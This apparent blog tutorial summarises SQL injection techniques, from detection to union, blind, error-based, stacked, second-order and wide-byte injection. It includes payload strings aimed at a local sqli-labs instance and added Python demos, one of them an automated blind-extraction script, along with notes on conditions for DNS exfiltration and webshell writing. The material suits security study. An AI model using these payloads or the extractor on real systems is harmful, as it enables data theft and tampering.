[network security] SQL injection syntax summary
2022-07-07 14:04:00 【Penguin jumping stairs】
Catalog
1. Principle
2. SQL injection judgment methods
3. union injection
4. Blind injection
 4.1 Boolean-based blind injection
 4.2 Time-based blind injection
5. Error-based injection
6. Stacked injection
7. Second-order injection
8. Wide-byte injection
9. dnslog injection
10. Writing a webshell through SQL injection
11. Summary
1. Principle
SQL injection means inserting SQL commands into a web form submission, a domain name, or the query string of a page request so that the server is tricked into executing attacker-supplied SQL.
SQL syntax lets database commands and user data sit in the same string. If the developer is careless, user data is interpreted as part of the command. A remote user is then no longer limited to feeding input to the web application: they can run arbitrary statements against the database with whatever privileges the application's database account has.
2. SQL injection judgment methods
2.1 Character (string) type detection
To test whether a URL parameter is injectable inside a quoted string, append a single quote to it:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
The page returns an error saying, roughly, that there is a mistake in your SQL syntax. Appending a comment character after the quote (%23, the URL encoding of #) makes the page display normally again, because the dangling quote from the original query is commented out.
Appending and 1=1 after the quote returns the normal page:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#
Changing 1=1 to 1=2 makes the page error out or come back empty:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#
2.2 Numeric type detection
Append and 1=1 directly, without any quote:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1
If the page still displays normally, repeat with 1=2:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2
If the page changes, the parameter is a numeric injection point. The value is compared as an integer (think of an int column), so no quote is needed to break out of it.
2.3 Search-box detection and other types
These are variants of string-type detection. Use the error messages to work out how the value is wrapped, for example in a like '%...%' pattern or inside ("...") or ('...'), and close that structure before the payload.
3. union injection
3.1 order by to count columns, and an error-based variant
Increase N in order by N--+ until the database complains about an unknown column; the last N that works is the number of columns the original query returns. Where errors are echoed, the same position can also carry an error-based payload, for example leaking the number of schemas through updatexml():
select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
3.2 union select
Once the column count is known (three here), the injected select must return the same number of columns. An id that does not exist (111) suppresses the real row so the injected one is displayed; group_concat() packs all table names of the schema into a single field:
?id=111' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='Database name') --+
4. Blind injection
4.1 Boolean-based blind injection
The page returns no data, only a true/false difference (normal page versus error or empty page), so every fact is extracted one comparison at a time. %23 is the URL-encoded # comment. Replace Database name, Table name and Field name with the values recovered in the previous step.
(1) Length of the current database name
and (length(database()))>8%23
(2) First character of the current database name (narrow the ASCII value by comparison)
and (ascii(substr(database(),1,1)))<120 %23
(3) Number of tables in the database
and (select count(*) from information_schema.tables where table_schema='Database name')>4 %23
(4) Length of the first table name in the database
and (length((select table_name from information_schema.tables where table_schema='Database name' limit 0,1)))=6%23
(5) First character of the first table name
and (ascii(substr((select table_name from information_schema.tables where table_schema='Database name' limit 0,1),1,1))>100)%23
(6) Length of the first column name in that table
and (length((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1)))=2%23
(7) First character of the first column name in that table
and (ascii(substr((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1),1,1)))=105 %23
(8) First character of the first row of the recovered field
and (ascii(substr((select Field name from Table name limit 0,1),1,1)))=68 %23
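The payloads above are the individual probes; what a practitioner actually runs is a loop that turns them into an extraction algorithm. The following is an added example written for this page, not code from the original post: a constructed stand-in for a vulnerable page (an in-memory SQLite database with a users table, plus user-defined database() and ascii() functions so the conditions read like the MySQL ones above), and an extractor that first finds the length of an expression and then binary-searches each character's ASCII code. SQLite has no # comment, so the injected suffix ends in "-- " instead of %23; the table contents and the database name "security" are assumptions.

```python
import sqlite3

# Constructed stand-in for the vulnerable page (sqli-labs Less-1 style):
# a users table plus MySQL-like database() and ascii() functions so the
# payloads read like the ones listed above. sqlite has no '#' comment, so
# the injected suffix ends in '-- ' instead of %23. Data is made up.
def make_target():
    conn = sqlite3.connect(":memory:")
    conn.create_function("database", 0, lambda: "security")
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    conn.commit()
    return conn

def page_is_normal(conn, injected_id):
    """Vulnerable handler: ?id= is concatenated inside single quotes.
    True means the page renders a row ('normal'); an empty result or a
    database error is the 'abnormal' page. This is the only signal we get."""
    sql = "SELECT username FROM users WHERE id='%s' LIMIT 1" % injected_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def make_oracle(conn):
    """Turn the page into a yes/no oracle for an arbitrary SQL condition,
    exactly as the 'and (...)%23' payloads above do."""
    return lambda cond: page_is_normal(conn, "1' and (%s)-- " % cond)

def extract(oracle, expr, max_len=64):
    """Recover the string value of SQL expression `expr` through the oracle:
    find its length with length()=n, then binary-search ascii(substr())
    per position over printable ASCII (about 7 queries per character)."""
    length = None
    for n in range(max_len + 1):
        if oracle("length((%s))=%d" % (expr, n)):
            length = n
            break
    if length is None:
        raise ValueError("value longer than max_len or oracle not working")
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126          # answer is always within [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("ascii(substr((%s),%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1      # character code is above mid
            else:
                hi = mid          # character code is mid or below
        chars.append(chr(lo))
    return "".join(chars)

if __name__ == "__main__":
    oracle = make_oracle(make_target())
    print(extract(oracle, "database()"))                                  # security
    print(extract(oracle, "select password from users limit 1,1"))        # I-kill-you
```

Against a real MySQL target the only changes are the transport (an HTTP request instead of page_is_normal) and the comment suffix; the expressions passed to extract() can be any of the subqueries listed in (3) to (8).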
4.2 Time-based blind injection
When the page looks the same for true and false, use the response time as the signal: if(condition, sleep(5), 1) delays the reply by 5 seconds only when the condition holds. Keep each request's baseline latency in mind and use a delay comfortably above it.
(1) Confirm that the delay function is available
and sleep(5) %23
(2) Length of the current database name (delays 5 seconds if correct)
and if((length(database()))>7,sleep(5),1) --+
(3) Is the first character of the current database name 'a'
and if((substr(database(),1,1)='a'),sleep(5),1) %23
(4) Is the ASCII code of the first character of the current database name 100
and if((ascii(substr(database(),1,1))=100),sleep(5),1) %23
(5) Number of tables
and if((select count(*) from information_schema.tables where table_schema='Database name')=4,sleep(5),1)%23
(6) Length of a table name (limit 3,1 selects the fourth table)
and if((select length((select table_name from information_schema.tables where table_schema='Database name' limit 3,1))=5),sleep(5),1)%23
(7) First character of that table name (117 is 'u')
and if((select ascii(substr((select table_name from information_schema.tables where table_schema='Database name' limit 3,1),1,1)))=117,sleep(5),1)%23
(8) Number of columns in the table
and if(((select count(*) from information_schema.columns where table_schema='Database name' and table_name='users')=3),sleep(5),1)%23
(9) Length of a column name
and if((select length((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1))=2),sleep(5),1)%23
(10) First character of that column name
and if((select ascii(substr((select column_name from information_schema.columns where table_schema='Database name' and table_name='Table name' limit 0,1),1,1)))=105,sleep(5),1)%23
(11) Length of the first value in the id column
and if((select length((select id from Table name limit 0,1)))=1,sleep(5),1)%23
(12) First character of that value (49 is '1')
and if((select ascii(substr((select id from Table name limit 0,1),1,1)))=49,sleep(5),1)%23
5. Error-based injection
Error-based injection requires the application to echo database error messages. The value to leak is wrapped in 0x7e (~) so it stands out in the error text. In the examples below (select database()) is a placeholder for whatever expression you want leaked; updatexml() and extractvalue() report at most 32 characters of it, so use substr() for longer values.
(1) floor()
rand(0) is a deterministic sequence, so the computed group key repeats and the group by raises a "Duplicate entry ... for key group_key" error that contains the concatenated value:
and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
(2) extractvalue()
select * from users where id=1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)));
(3) updatexml()
select * from users where id=1 and (updatexml(1,concat(0x7e,(select database()),0x7e),1));
The spatial functions (4) to (9) and exp() in (10) only error out with the value on older MySQL 5.x builds; later releases fixed the error message and these payloads return nothing useful there.
(4) geometrycollection()
select * from users where id=1 and geometrycollection((select * from(select * from(select database())a)b));
(5) multipoint()
select * from users where id=1 and multipoint((select * from(select * from(select database())a)b));
(6) polygon()
select * from users where id=1 and polygon((select * from(select * from(select database())a)b));
(7) multipolygon()
select * from users where id=1 and multipolygon((select * from(select * from(select database())a)b));
(8) linestring()
select * from users where id=1 and linestring((select * from(select * from(select database())a)b));
(9) multilinestring()
select * from users where id=1 and multilinestring((select * from(select * from(select database())a)b));
(10) exp()
select * from users where id=1 and exp(~(select * from(select database())a));
6. Stacked injection
Principle: mysqli_multi_query() executes several SQL statements passed in one string, separated by ;, one after another ("stacked"). For example
select * from users;show databases;
runs both statements. With enough privileges the attacker is therefore not limited to the SELECT the page intended and can insert, update, delete or run DDL.
Although this position is powerful, it is rare in practice. Whether the statements after the ; run depends on the API, the database driver and the account's privileges: they only execute if the application calls the database through an interface that accepts multiple statements, such as mysqli_multi_query(). PHP code commonly uses mysqli_query(), which executes a single statement and ignores whatever follows the semicolon, so the preconditions for stacked injection are seldom met. When they are, the impact on the site is severe.
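The difference between a single-statement API and a multi-statement API is the whole story of stacked injection, so here is an added example (not from the original post) that shows it with Python's sqlite3 module standing in for the two PHP functions: Connection.execute() accepts exactly one statement, like mysqli_query(), while Connection.executescript() runs everything in the string, like mysqli_multi_query(). The users table, the handler and the payload are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in: one users row and a handler that concatenates ?id=
# directly into the statement (numeric context, no quotes).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Dumb')")
    conn.commit()
    return conn

def username_of(conn, user_id):
    """Helper to observe whether the stacked UPDATE took effect."""
    return conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()[0]

def lookup_single_statement(conn, user_input):
    """Like mysqli_query(): the driver executes exactly one statement and
    refuses a string that contains a second one. Returns ('ok', rows) or
    ('error', message). The payload after ';' never runs here."""
    sql = "SELECT username FROM users WHERE id=%s" % user_input
    try:
        return "ok", conn.execute(sql).fetchall()
    except (sqlite3.Warning, sqlite3.Error) as e:
        # sqlite3 reports 'You can only execute one statement at a time.'
        return "error", str(e)

def lookup_multi_statement(conn, user_input):
    """Like mysqli_multi_query(): the whole string is run as a script, so
    the attacker's second statement executes with the application's rights."""
    sql = "SELECT username FROM users WHERE id=%s" % user_input
    conn.executescript(sql)
    return "ok"

# Attacker-controlled value of ?id=: closes the SELECT, adds an UPDATE,
# comments out anything the application appends afterwards.
STACKED_PAYLOAD = "1; UPDATE users SET username='hacked' WHERE id=1-- "

if __name__ == "__main__":
    db = make_db()
    print(lookup_single_statement(db, STACKED_PAYLOAD)[0], username_of(db, 1))  # error Dumb
    print(lookup_multi_statement(db, STACKED_PAYLOAD), username_of(db, 1))      # ok hacked
```

The single-statement path still has an injection bug (the SELECT itself is attacker-controlled and union or blind techniques apply), but it cannot be escalated to arbitrary statements; only the multi-statement API turns the same input into an UPDATE.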
7. Second-order injection
Second-order injection happens in two steps:
(1) Insert malicious data. When the data is written, special characters are escaped (for example with addslashes()) so that the INSERT itself is safe, but the escaping only protects that one statement: the value stored in the database still contains the original quote characters.
(2) Reuse the malicious data. The application treats whatever is already in the database as trusted. When it later reads the value back and concatenates it into another query without escaping or binding it, the stored payload executes.
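The two steps above are easiest to see with the classic password-change scenario. This is an added example written for this page, not code from the original post: a constructed SQLite application whose registration form binds its parameters (step 1, safe on its own) and whose password-change page later reads the username back from the database and concatenates it into an UPDATE (step 2). The user names, passwords and table layout are assumptions made for the demonstration.

```python
import sqlite3

# Constructed stand-in for a site with registration and password change.
def make_app():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def register(conn, username, password):
    """Step 1 (insert): the registration form binds its parameters, so a
    username like "admin'-- " is stored safely, quote and all. Returns the
    new user's id, which is what the session later carries."""
    cur = conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()
    return cur.lastrowid

def change_password_vulnerable(conn, user_id, new_password):
    """Step 2 (reuse): the page looks the username up by session id, trusts
    it because it came from the database, and concatenates it into the
    UPDATE. The stored quote closes the string and '-- ' comments out the
    rest, so the WHERE clause now matches the real 'admin' row."""
    username = conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()[0]
    sql = "UPDATE users SET password='%s' WHERE username='%s'" % (new_password, username)
    conn.execute(sql)
    conn.commit()

def change_password_fixed(conn, user_id, new_password):
    """Same flow with the stored value bound as a parameter: data read back
    from the database is still data, never SQL."""
    username = conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()[0]
    conn.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))
    conn.commit()

def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_app()
    attacker = register(db, "admin'-- ", "attacker-pw")   # step 1: harmless on its own
    change_password_vulnerable(db, attacker, "pwned")     # step 2: admin's password changes
    print(password_of(db, "admin"), password_of(db, "admin'-- "))   # pwned attacker-pw
```

Note that escaping at registration time would not have helped either: the INSERT was already safe. The defect is entirely in the second query, which is why input validation at the edge is not a substitute for binding parameters everywhere a value meets SQL.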
8. Wide-byte injection
(1) Principle
When a parameter such as id=1' is passed, the single quote is treated as an illegal character and the filter function prefixes it with a backslash (\, byte 0x5c), so the query receives \' and the quote no longer closes the string. To get the quote through, that backslash has to be swallowed. HTTP parameters are URL-encoded, so we can place %81 (or any other byte in the 0x81 to 0xfe range, %df being the common choice) directly in front of the quote. After decoding and escaping, the bytes are 0x81 0x5c 0x27. If the connection interprets them as GBK, 0x81 0x5c is consumed as one two-byte character and the quote that follows survives unescaped.
(2) Conditions
Ⅰ: The database connection uses the GBK character set
Ⅱ: Escaping is done with addslashes(), mysql_real_escape_string() or mysql_escape_string() without the connection charset being set correctly (mysql_real_escape_string() only handles multibyte characters when mysql_set_charset() has told the client library which charset is in use)
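The byte-level mechanism is easy to reproduce offline. The following is an added example written for this page, not code from the original post: a byte-for-byte reimplementation of PHP's addslashes(), a constructed vulnerable query builder, and a check that tells whether the injected quote is still escaped after the server decodes the bytes as GBK versus UTF-8. The query shape and parameter names are assumptions.

```python
from urllib.parse import unquote_to_bytes

def addslashes(raw: bytes) -> bytes:
    """PHP addslashes() on raw bytes: a backslash (0x5c) before ' " \\ and NUL.
    It works byte by byte and knows nothing about multibyte characters."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

QUERY_PREFIX = "SELECT * FROM users WHERE id='"

def build_query(param: str, charset: str) -> str:
    """Vulnerable path: URL-decode the parameter, escape it with addslashes(),
    then let the connection interpret the bytes in `charset` and build the
    statement by concatenation. For '1%81%27' the escaped bytes are
    31 81 5c 27; GBK swallows 81 5c as one character, leaving the quote bare."""
    raw = unquote_to_bytes(param)
    escaped = addslashes(raw)
    decoded = escaped.decode(charset, errors="replace")
    return QUERY_PREFIX + decoded + "'"

def quote_escaped(sql: str) -> bool:
    """True if every quote inside the value is still preceded by a backslash,
    i.e. the escaping held and the string was not broken out of."""
    inner = sql[len(QUERY_PREFIX):-1]        # the value between the outer quotes
    return all(i > 0 and inner[i - 1] == "\\"
               for i, ch in enumerate(inner) if ch == "'")

if __name__ == "__main__":
    for param in ("1%27", "1%81%27", "1%df%27"):
        for charset in ("utf-8", "gbk"):
            q = build_query(param, charset)
            print(charset, repr(q), "escaped" if quote_escaped(q) else "BROKEN OUT")
```

The fix is not a longer blacklist of bytes: either bind parameters, or set the connection charset explicitly (mysql_set_charset('gbk') / mysqli_set_charset) so that the escaping routine and the server agree on where characters begin and end.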
9. dnslog injection
(1) Conditions
secure_file_priv in my.ini must be the empty string, so that load_file() may read an arbitrary path. On a Windows-hosted MySQL, reading a UNC path whose host name contains the data to exfiltrate makes the server resolve that name, and the data shows up in the attacker's DNS log. The three settings behave as follows:
● secure_file_priv = NULL: import and export are not allowed
● secure_file_priv = /tmp: import and export are allowed only under the /tmp directory
● secure_file_priv = "" (empty): import and export are allowed without restriction
10. Writing a webshell through SQL injection
(1) Conditions
Ⅰ: The database account used by the injection has DBA-level privileges (sqlmap's --is-dba reports true); concretely, select ... into outfile requires the FILE privilege
Ⅱ: The absolute path of the web root is known
Ⅲ: secure_file_priv="" in my.ini, i.e. the empty string (a NULL value disables file export entirely)
11. Summary
This is material I have collected over a long time; I hope fellow practitioners can read it through to the end.